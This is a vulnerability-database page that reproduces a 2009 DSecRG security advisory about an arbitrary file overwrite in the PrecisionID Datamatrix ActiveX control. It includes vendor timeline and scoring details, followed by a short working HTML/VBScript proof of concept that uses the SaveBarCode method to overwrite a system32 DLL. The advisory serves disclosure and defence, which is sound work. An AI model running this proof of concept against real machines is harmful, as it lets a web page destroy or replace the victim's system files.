Lucene search
+L

PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite

🗓️ 31 Mar 2009 00:00:00Reported by DSecRGType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

PrecisionID Datamatrix ActiveX Arbitrary File Overwrite vulnerability advisor

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1212
31 Mar 200900:00
circl
cve
CVE
CVE-2009-1212
1 Apr 200910:00
cve
cvelist
Cvelist
CVE-2009-1212
1 Apr 200910:00
cvelist
euvd
EUVD
EUVD-2009-1211
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1212
1 Apr 200910:30
nvd
prion
Prion
Design/Logic Flaw
1 Apr 200910:30
prion
seebug
seebug.org
PrecisionID Data Matrix Barcode ActiveX控件任意文件覆盖漏洞
2 Apr 200900:00
seebug
Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-030
!!!             original advisory            !!!
http://dsecrg.com/pages/vul/DSECRG-09-030.html


Application:                    PrecisionID activeX controls
Versions Affected:
Vendor URL:                     http://PrecisionID.com
Bugs:                           Arbitrary File overwriting
Exploits:                       YES
Reported:                       03.03.2009
Vendor response:                NONE
Secondly Reported:              17.03.2009
Vendor response:                NONE
Date of Public Advisory:        31.0300.2009
Authors:
                                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

PrecisionID  have activeX control DMATRIXLib.Datamatrix that can be used to overwrite any any file in target system.



Details
*******


This control contains two methods SaveBarCode() SaveEnhWMF() that can be used to owervrite
any file on OS


Sub SaveBarCode (
        ByVal path  As String
)


Sub SaveEnhWMF (
        ByVal path  As String
)






*******
Example:



<html>
<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='target' />
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\PRECIS~2.DLL"
prototype  = "Sub SaveBarCode ( ByVal path As String )"
memberName = "SaveBarCode"
progid     = "DMATRIXLib.Datamatrix"
argCount   = 1

arg1="C:\sh2kerr.pwn"

target.SaveBarCode arg1

</script>
</html>



Solution
********
http://msdn.microsoft.com/en-us/library/aa751977.aspx


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsecrg [dot]  com
            http://www.dsecrg.com
            http://www.dsec.ru

# milw0rm.com [2009-03-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.05742
40